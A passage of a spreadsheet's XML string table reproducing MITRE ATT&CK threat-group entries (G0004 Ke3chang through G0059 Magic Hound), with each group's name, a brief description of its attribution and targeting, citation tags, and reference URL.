    <t>Ke3chang</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) is a threat group attributed to actors operating out of China.
[Ke3chang](https://attack.mitre.org/groups/G0004) has targeted several industries, including oil, government, military, and more. (Citation: Villeneuve et al 2014) (Citation: NCC Group APT15 Alive and Strong) (Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0004</t>
  </si>
  <si>
    <t>G0005</t>
  </si>
  <si>
    <t>APT12</t>
  </si>
  <si>
    <t>[APT12](https://attack.mitre.org/groups/G0005) is a threat group that has been attributed to China. The group has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments.(Citation: Meyers Numbered Panda)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0005</t>
  </si>
  <si>
    <t>G0006</t>
  </si>
  <si>
    <t>APT1</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) is a Chinese threat group that has been attributed to the 2nd Bureau of the People's Liberation Army (PLA) General Staff Department's (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0006</t>
  </si>
  <si>
    <t>G0007</t>
  </si>
  <si>
    <t>APT28</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's Main Intelligence Directorate of the Russian General Staff by a July 2018 U.S. Department of Justice indictment. This group reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. [APT28](https://attack.mitre.org/groups/G0007) has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018) (Citation: Ars Technica GRU indictment Jul 2018) (Citation: Crowdstrike DNC June 2016) (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: FireEye APT28 January 2017) (Citation: GRIZZLY STEPPE JAR) (Citation: Sofacy DealersChoice) (Citation: Palo Alto Sofacy 06-2018) (Citation: Symantec APT28 Oct 2018) (Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0007</t>
  </si>
  <si>
    <t>G0008</t>
  </si>
  <si>
    <t>Carbanak</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/groups/G0008) is a threat group that mainly targets banks. It also refers to malware of the same name ([Carbanak](https://attack.mitre.org/software/S0030)). It is sometimes referred to as [FIN7](https://attack.mitre.org/groups/G0046), but these appear to be two groups using the same [Carbanak](https://attack.mitre.org/software/S0030) malware and are therefore tracked separately. (Citation: Kaspersky Carbanak) (Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0008</t>
  </si>
  <si>
    <t>G0009</t>
  </si>
  <si>
    <t>Deep Panda</t>
  </si>
  <si>
    <t>[Deep Panda](https://attack.mitre.org/groups/G0009) is a suspected Chinese threat group known to target many industries, including government, defense, financial, and telecommunications. (Citation: Alperovitch 2014) The intrusion into healthcare company Anthem has been attributed to [Deep Panda](https://attack.mitre.org/groups/G0009). (Citation: ThreatConnect Anthem) This group is also known as Shell Crew, WebMasters, KungFu Kittens, and PinkPanther. (Citation: RSA Shell Crew) [Deep Panda](https://attack.mitre.org/groups/G0009) also appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion. (Citation: Symantec Black Vine) Some analysts track [Deep Panda](https://attack.mitre.org/groups/G0009) and [APT19](https://attack.mitre.org/groups/G0073) as the same group, but it is unclear from open source information if the groups are the same. (Citation: ICIT China's Espionage Jul 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0009</t>
  </si>
  <si>
    <t>G0010</t>
  </si>
  <si>
    <t>Turla</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) is a Russian-based threat group that has infected victims in over 45 countries, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies since 2004. Heightened activity was seen in mid-2015. [Turla](https://attack.mitre.org/groups/G0010) is known for conducting watering hole and spearphishing campaigns and leveraging in-house tools and malware. [Turla](https://attack.mitre.org/groups/G0010)'s espionage platform is mainly used against Windows machines, but has also been seen used against macOS and Linux machines. (Citation: Kaspersky Turla) (Citation: ESET Gazer Aug 2017) (Citation: CrowdStrike VENOMOUS BEAR) (Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0010</t>
  </si>
  <si>
    <t>G0011</t>
  </si>
  <si>
    <t>PittyTiger</t>
  </si>
  <si>
    <t>[PittyTiger](https://attack.mitre.org/groups/G0011) is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control. (Citation: Bizeul 2014) (Citation: Villeneuve 2014)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0011</t>
  </si>
  <si>
    <t>G0012</t>
  </si>
  <si>
    <t>Darkhotel</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) is a threat group that has been active since at least 2004. The group has conducted activity on hotel and business center Wiâ€‘Fi and physical connections as well as peer-to-peer and file sharing networks. The actors have also conducted spearphishing. (Citation: Kaspersky Darkhotel)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0012</t>
  </si>
  <si>
    <t>G0013</t>
  </si>
  <si>
    <t>APT30</t>
  </si>
  <si>
    <t>[APT30](https://attack.mitre.org/groups/G0013) is a threat group suspected to be associated with the Chinese government. (Citation: FireEye APT30) While [Naikon](https://attack.mitre.org/groups/G0019) shares some characteristics with [APT30](https://attack.mitre.org/groups/G0013), the two groups do not appear to be exact matches. (Citation: Baumgartner Golovkin Naikon 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0013</t>
  </si>
  <si>
    <t>G0014</t>
  </si>
  <si>
    <t>Night Dragon</t>
  </si>
  <si>
    <t>[Night Dragon](https://attack.mitre.org/groups/G0014) is a campaign name for activity involving a threat group that has conducted activity originating primarily in China. (Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0014</t>
  </si>
  <si>
    <t>G0015</t>
  </si>
  <si>
    <t>Taidoor</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/groups/G0015) is a threat group that has operated since at least 2009 and has primarily targeted the Taiwanese government. (Citation: TrendMicro Taidoor)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0015</t>
  </si>
  <si>
    <t>G0016</t>
  </si>
  <si>
    <t>APT29</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to the Russian government and has operated since at least 2008. (Citation: F-Secure The Dukes) (Citation: GRIZZLY STEPPE JAR) This group reportedly compromised the Democratic National Committee starting in the summer of 2015. (Citation: Crowdstrike DNC June 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0016</t>
  </si>
  <si>
    <t>G0017</t>
  </si>
  <si>
    <t>DragonOK</t>
  </si>
  <si>
    <t>[DragonOK](https://attack.mitre.org/groups/G0017) is a threat group that has targeted Japanese organizations with phishing emails. Due to overlapping TTPs, including similar custom tools, [DragonOK](https://attack.mitre.org/groups/G0017) is thought to have a direct or indirect relationship with the threat group [Moafee](https://attack.mitre.org/groups/G0002). (Citation: Operation Quantum Entanglement) It is known to use a variety of malware, including Sysget/HelloBridge, PlugX, PoisonIvy, FormerFirstRat, NFlog, and NewCT. (Citation: New DragonOK)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0017</t>
  </si>
  <si>
    <t>G0018</t>
  </si>
  <si>
    <t>admin@338</t>
  </si>
  <si>
    <t>[admin@338](https://attack.mitre.org/groups/G0018) is a China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as [PoisonIvy](https://attack.mitre.org/software/S0012), as well as some non-public backdoors. (Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0018</t>
  </si>
  <si>
    <t>G0019</t>
  </si>
  <si>
    <t>Naikon</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) is a threat group that has focused on targets around the South China Sea. (Citation: Baumgartner Naikon 2015) The group has been attributed to the Chinese People's Liberation Army's (PLA) Chengdu Military Region Second Technical Reconnaissance Bureau (Military Unit Cover Designator 78020). (Citation: CameraShy) While [Naikon](https://attack.mitre.org/groups/G0019) shares some characteristics with [APT30](https://attack.mitre.org/groups/G0013), the two groups do not appear to be exact matches. (Citation: Baumgartner Golovkin Naikon 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0019</t>
  </si>
  <si>
    <t>G0020</t>
  </si>
  <si>
    <t>Equation</t>
  </si>
  <si>
    <t>[Equation](https://attack.mitre.org/groups/G0020) is a sophisticated threat group that employs multiple remote access tools. The group is known to use zero-day exploits and has developed the capability to overwrite the firmware of hard disk drives. (Citation: Kaspersky Equation QA)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0020</t>
  </si>
  <si>
    <t>G0021</t>
  </si>
  <si>
    <t>Molerats</t>
  </si>
  <si>
    <t>[Molerats](https://attack.mitre.org/groups/G0021) is a politically-motivated threat group that has been operating since 2012. The group's victims have primarily been in the Middle East, Europe, and the United States. (Citation: DustySky) (Citation: DustySky2)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0021</t>
  </si>
  <si>
    <t>G0022</t>
  </si>
  <si>
    <t>APT3</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) is a China-based threat group that researchers have attributed to China's Ministry of State Security. (Citation: FireEye Clandestine Wolf) (Citation: Recorded Future APT3 May 2017) This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap. (Citation: FireEye Clandestine Wolf) (Citation: FireEye Operation Double Tap) As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong. (Citation: Symantec Buckeye)
MITRE has also developed an APT3 Adversary Emulation Plan.(Citation: APT3 Adversary Emulation Plan)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0022</t>
  </si>
  <si>
    <t>G0023</t>
  </si>
  <si>
    <t>APT16</t>
  </si>
  <si>
    <t>[APT16](https://attack.mitre.org/groups/G0023) is a China-based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations. (Citation: FireEye EPS Awakens Part 2)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0023</t>
  </si>
  <si>
    <t>G0024</t>
  </si>
  <si>
    <t>Putter Panda</t>
  </si>
  <si>
    <t>[Putter Panda](https://attack.mitre.org/groups/G0024) is a Chinese threat group that has been attributed to Unit 61486 of the 12th Bureau of the PLA's 3rd General Staff Department (GSD). (Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0024</t>
  </si>
  <si>
    <t>G0025</t>
  </si>
  <si>
    <t>APT17</t>
  </si>
  <si>
    <t>[APT17](https://attack.mitre.org/groups/G0025) is a China-based threat group that has conducted network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations. (Citation: FireEye APT17)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0025</t>
  </si>
  <si>
    <t>G0026</t>
  </si>
  <si>
    <t>APT18</t>
  </si>
  <si>
    <t>[APT18](https://attack.mitre.org/groups/G0026) is a threat group that has operated since at least 2009 and has targeted a range of industries, including technology, manufacturing, human rights groups, government, and medical. (Citation: Dell Lateral Movement)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0026</t>
  </si>
  <si>
    <t>G0027</t>
  </si>
  <si>
    <t>Threat Group-3390</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) is a Chinese threat group that has extensively used strategic Web compromises to target victims. (Citation: Dell TG-3390) The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, and manufacturing sectors. (Citation: SecureWorks BRONZE UNION June 2017) (Citation: Securelist LuckyMouse June 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0027</t>
  </si>
  <si>
    <t>G0028</t>
  </si>
  <si>
    <t>Threat Group-1314</t>
  </si>
  <si>
    <t>[Threat Group-1314](https://attack.mitre.org/groups/G0028) is an unattributed threat group that has used compromised credentials to log into a victim's remote access infrastructure. (Citation: Dell TG-1314)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0028</t>
  </si>
  <si>
    <t>G0029</t>
  </si>
  <si>
    <t>Scarlet Mimic</t>
  </si>
  <si>
    <t>[Scarlet Mimic](https://attack.mitre.org/groups/G0029) is a threat group that has targeted minority rights activists. This group has not been directly linked to a government source, but the group's motivations appear to overlap with those of the Chinese government. While there is some overlap between IP addresses used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029) and [Putter Panda](https://attack.mitre.org/groups/G0024), it has not been concluded that the groups are the same. (Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0029</t>
  </si>
  <si>
    <t>G0030</t>
  </si>
  <si>
    <t>Lotus Blossom</t>
  </si>
  <si>
    <t>[Lotus Blossom](https://attack.mitre.org/groups/G0030) is a threat group that has targeted government and military organizations in Southeast Asia. (Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0030</t>
  </si>
  <si>
    <t>G0031</t>
  </si>
  <si>
    <t>Dust Storm</t>
  </si>
  <si>
    <t>[Dust Storm](https://attack.mitre.org/groups/G0031) is a threat group that has targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries. (Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0031</t>
  </si>
  <si>
    <t>G0032</t>
  </si>
  <si>
    <t>Lazarus Group</t>
  </si>
  <si>
    <t>[Lazarus Group](https://attack.mitre.org/groups/G0032) is a threat group that has been attributed to the North Korean government.(Citation: US-CERT HIDDEN COBRA June 2017) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novetta Blockbuster) In late 2017, [Lazarus Group](https://attack.mitre.org/groups/G0032) used KillDisk, a disk-wiping tool, in an attack against an online casino based in Central America. (Citation: Lazarus KillDisk)
North Korean group definitions are known to have significant overlap, and the name [Lazarus Group](https://attack.mitre.org/groups/G0032) is known to encompass a broad range of activity. Some organizations use the name Lazarus Group to refer to any activity attributed to North Korea.(Citation: US-CERT HIDDEN COBRA June 2017) Some organizations track North Korean clusters or groups such as Bluenoroff,(Citation: Kaspersky Lazarus Under The Hood Blog 2017) [APT37](https://attack.mitre.org/groups/G0067), and [APT38](https://attack.mitre.org/groups/G0082) separately, while other organizations may track some activity associated with those group names by the name Lazarus Group.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0032</t>
  </si>
  <si>
    <t>G0033</t>
  </si>
  <si>
    <t>Poseidon Group</t>
  </si>
  <si>
    <t>[Poseidon Group](https://attack.mitre.org/groups/G0033) is a Portuguese-speaking threat group that has been active since at least 2005. The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the [Poseidon Group](https://attack.mitre.org/groups/G0033) as a security firm. (Citation: Kaspersky Poseidon Group)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0033</t>
  </si>
  <si>
    <t>G0034</t>
  </si>
  <si>
    <t>Sandworm Team</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) is a Russian cyber espionage group that has operated since approximately 2009. The group likely consists of Russian pro-hacktivists. [Sandworm Team](https://attack.mitre.org/groups/G0034) targets mainly Ukrainian entities associated with energy, industrial control systems, SCADA, government, and media. [Sandworm Team](https://attack.mitre.org/groups/G0034) has been linked to the Ukrainian energy sector attack in late 2015.
 (Citation: iSIGHT Sandworm 2014) (Citation: CrowdStrike VOODOO BEAR)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0034</t>
  </si>
  <si>
    <t>G0035</t>
  </si>
  <si>
    <t>Dragonfly</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been active since at least 2011. They initially targeted defense and aviation companies but shifted to focus on the energy sector in early 2013. They have also targeted companies related to industrial control systems. (Citation: Symantec Dragonfly)
A similar group emerged in 2015 and was identified by Symantec as [Dragonfly 2.0](https://attack.mitre.org/groups/G0074). There is debate over the extent of the overlap between [Dragonfly](https://attack.mitre.org/groups/G0035) and [Dragonfly 2.0](https://attack.mitre.org/groups/G0074), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Symantec Dragonfly Sept 2017) (Citation: Fortune Dragonfly 2.0 Sept 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0035</t>
  </si>
  <si>
    <t>G0036</t>
  </si>
  <si>
    <t>GCMAN</t>
  </si>
  <si>
    <t>[GCMAN](https://attack.mitre.org/groups/G0036) is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services. (Citation: Securelist GCMAN)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0036</t>
  </si>
  <si>
    <t>G0037</t>
  </si>
  <si>
    <t>FIN6</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0037</t>
  </si>
  <si>
    <t>G0038</t>
  </si>
  <si>
    <t>Stealth Falcon</t>
  </si>
  <si>
    <t>[Stealth Falcon](https://attack.mitre.org/groups/G0038) is a threat group that has conducted targeted spyware attacks against Emirati journalists, activists, and dissidents since at least 2012. Circumstantial evidence suggests there could be a link between this group and the United Arab Emirates (UAE) government, but that has not been confirmed. (Citation: Citizen Lab Stealth Falcon May 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0038</t>
  </si>
  <si>
    <t>G0039</t>
  </si>
  <si>
    <t>Suckfly</t>
  </si>
  <si>
    <t>[Suckfly](https://attack.mitre.org/groups/G0039) is a China-based threat group that has been active since at least 2014. (Citation: Symantec Suckfly March 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0039</t>
  </si>
  <si>
    <t>G0040</t>
  </si>
  <si>
    <t>Patchwork</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) is a cyberespionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. [Patchwork](https://attack.mitre.org/groups/G0040) has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. [Patchwork](https://attack.mitre.org/groups/G0040) was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018. (Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork) (Citation: TrendMicro Patchwork Dec 2017) (Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0040</t>
  </si>
  <si>
    <t>G0041</t>
  </si>
  <si>
    <t>Strider</t>
  </si>
  <si>
    <t>[Strider](https://attack.mitre.org/groups/G0041) is a threat group that has been active since at least 2011 and has targeted victims in Russia, China, Sweden, Belgium, Iran, and Rwanda. (Citation: Symantec Strider Blog) (Citation: Kaspersky ProjectSauron Blog)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0041</t>
  </si>
  <si>
    <t>G0042</t>
  </si>
  <si>
    <t>MONSOON</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0042</t>
  </si>
  <si>
    <t>G0043</t>
  </si>
  <si>
    <t>Group5</t>
  </si>
  <si>
    <t>[Group5](https://attack.mitre.org/groups/G0043) is a threat group with a suspected Iranian nexus, though this attribution is not definite. The group has targeted individuals connected to the Syrian opposition via spearphishing and watering holes, normally using Syrian and Iranian themes. [Group5](https://attack.mitre.org/groups/G0043) has used two commonly available remote access tools (RATs), [njRAT](https://attack.mitre.org/software/S0385) and [NanoCore](https://attack.mitre.org/software/S0336), as well as an Android RAT, DroidJack. (Citation: Citizen Lab Group5)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0043</t>
  </si>
  <si>
    <t>G0044</t>
  </si>
  <si>
    <t>Winnti Group</t>
  </si>
  <si>
    <t>[Winnti Group](https://attack.mitre.org/groups/G0044) is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting. (Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti June 2015) (Citation: Novetta Winnti April 2015) Some reporting suggests a number of other groups, including [Axiom](https://attack.mitre.org/groups/G0001), [APT17](https://attack.mitre.org/groups/G0025), and [Ke3chang](https://attack.mitre.org/groups/G0004), are closely linked to [Winnti Group](https://attack.mitre.org/groups/G0044). (Citation: 401 TRG Winnti Umbrella May 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0044</t>
  </si>
  <si>
    <t>G0045</t>
  </si>
  <si>
    <t>menuPass</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) is a threat group that appears to originate from China and has been active since approximately 2009. The group has targeted healthcare, defense, aerospace, and government sectors, and has targeted Japanese victims since at least 2014. In 2016 and 2017, the group targeted managed IT service providers, manufacturing and mining companies, and a university. (Citation: Palo Alto menuPass Feb 2017) (Citation: Crowdstrike CrowdCast Oct 2013) (Citation: FireEye Poison Ivy) (Citation: PWC Cloud Hopper April 2017) (Citation: FireEye APT10 April 2017) (Citation: DOJ APT10 Dec 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0045</t>
  </si>
  <si>
    <t>G0046</t>
  </si>
  <si>
    <t>FIN7</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) is a financially-motivated threat group that has primarily targeted the U.S. retail, restaurant, and hospitality sectors since mid-2015. They often use point-of-sale malware. A portion of [FIN7](https://attack.mitre.org/groups/G0046) was run out of a front company called Combi Security. [FIN7](https://attack.mitre.org/groups/G0046) is sometimes referred to as [Carbanak](https://attack.mitre.org/groups/G0008) Group, but these appear to be two groups using the same [Carbanak](https://attack.mitre.org/software/S0030) malware and are therefore tracked separately. (Citation: FireEye FIN7 March 2017) (Citation: FireEye FIN7 April 2017) (Citation: FireEye CARBANAK June 2017) (Citation: FireEye FIN7 Aug 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0046</t>
  </si>
  <si>
    <t>G0047</t>
  </si>
  <si>
    <t>Gamaredon Group</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) is a threat group that has been active since at least 2013 and has targeted individuals likely involved in the Ukrainian government. (Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0047</t>
  </si>
  <si>
    <t>G0048</t>
  </si>
  <si>
    <t>RTM</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/groups/G0048) is a cybercriminal group that has been active since at least 2015 and is primarily interested in users of remote banking systems in Russia and neighboring countries. The group uses a Trojan by the same name ([RTM](https://attack.mitre.org/software/S0148)). (Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0048</t>
  </si>
  <si>
    <t>G0049</t>
  </si>
  <si>
    <t>OilRig</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of industries, including financial, government, energy, chemical, and telecommunications, and has largely focused its operations within the Middle East. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests. (Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018) This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0049</t>
  </si>
  <si>
    <t>G0050</t>
  </si>
  <si>
    <t>APT32</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) is a threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as with foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims. The group is believed to be Vietnam-based. (Citation: FireEye APT32 May 2017) (Citation: Volexity OceanLotus Nov 2017) (Citation: ESET OceanLotus)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0050</t>
  </si>
  <si>
    <t>G0051</t>
  </si>
  <si>
    <t>FIN10</t>
  </si>
  <si>
    <t>[FIN10](https://attack.mitre.org/groups/G0051) is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016. The group uses stolen data exfiltrated from victims to extort organizations. (Citation: FireEye FIN10 June 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0051</t>
  </si>
  <si>
    <t>G0052</t>
  </si>
  <si>
    <t>CopyKittens</t>
  </si>
  <si>
    <t>[CopyKittens](https://attack.mitre.org/groups/G0052) is an Iranian cyber espionage group that has been operating since at least 2013. It has targeted countries including Israel, Saudi Arabia, Turkey, the U.S., Jordan, and Germany. The group is responsible for the campaign known as Operation Wilted Tulip. (Citation: ClearSky CopyKittens March 2017) (Citation: ClearSky Wilted Tulip July 2017) (Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0052</t>
  </si>
  <si>
    <t>G0053</t>
  </si>
  <si>
    <t>FIN5</t>
  </si>
  <si>
    <t>[FIN5](https://attack.mitre.org/groups/G0053) is a financially motivated threat group that has targeted personally identifiable information and payment card information. The group has been active since at least 2008 and has targeted the restaurant, gaming, and hotel industries. The group is made up of actors who likely speak Russian. (Citation: FireEye Respond Webinar July 2017) (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0053</t>
  </si>
  <si>
    <t>G0054</t>
  </si>
  <si>
    <t>Sowbug</t>
  </si>
  <si>
    <t>[Sowbug](https://attack.mitre.org/groups/G0054) is a threat group that has conducted targeted attacks against organizations in South America and Southeast Asia, particularly government entities, since at least 2015. (Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0054</t>
  </si>
  <si>
    <t>G0055</t>
  </si>
  <si>
    <t>NEODYMIUM</t>
  </si>
  <si>
    <t>[NEODYMIUM](https://attack.mitre.org/groups/G0055) is an activity group that conducted a campaign in May 2016 and has heavily targeted Turkish victims. The group has demonstrated similarity to another activity group called [PROMETHIUM](https://attack.mitre.org/groups/G0056) due to overlapping victim and campaign characteristics. (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21) [NEODYMIUM](https://attack.mitre.org/groups/G0055) is reportedly associated closely with [BlackOasis](https://attack.mitre.org/groups/G0063) operations, but evidence that the group names are aliases has not been identified. (Citation: CyberScoop BlackOasis Oct 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0055</t>
  </si>
  <si>
    <t>G0056</t>
  </si>
  <si>
    <t>PROMETHIUM</t>
  </si>
  <si>
    <t>[PROMETHIUM](https://attack.mitre.org/groups/G0056) is an activity group that has been active since at least 2012. The group conducted a campaign in May 2016 and has heavily targeted Turkish victims. [PROMETHIUM](https://attack.mitre.org/groups/G0056) has demonstrated similarity to another activity group called [NEODYMIUM](https://attack.mitre.org/groups/G0055) due to overlapping victim and campaign characteristics. (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0056</t>
  </si>
  <si>
    <t>G0057</t>
  </si>
  <si>
    <t>APT34</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0057</t>
  </si>
  <si>
    <t>G0058</t>
  </si>
  <si>
    <t>Charming Kitten</t>
  </si>
  <si>
    <t>[Charming Kitten](https://attack.mitre.org/groups/G0058) is an Iranian cyber espionage group that has been active since approximately 2014. They appear to focus on targeting individuals of interest to Iran who work in academic research, human rights, and media, with most victims having been located in Iran, the US, Israel, and the UK. [Charming Kitten](https://attack.mitre.org/groups/G0058) usually tries to access private email and Facebook accounts, and sometimes establishes a foothold on victim computers as a secondary objective. The group's TTPs overlap extensively with another group, [Magic Hound](https://attack.mitre.org/groups/G0059), resulting in reporting that may not distinguish between the two groups' activities. (Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0058</t>
  </si>
  <si>
    <t>G0059</t>
  </si>
  <si>
    <t>Magic Hound</t>
  </si>
  <si>
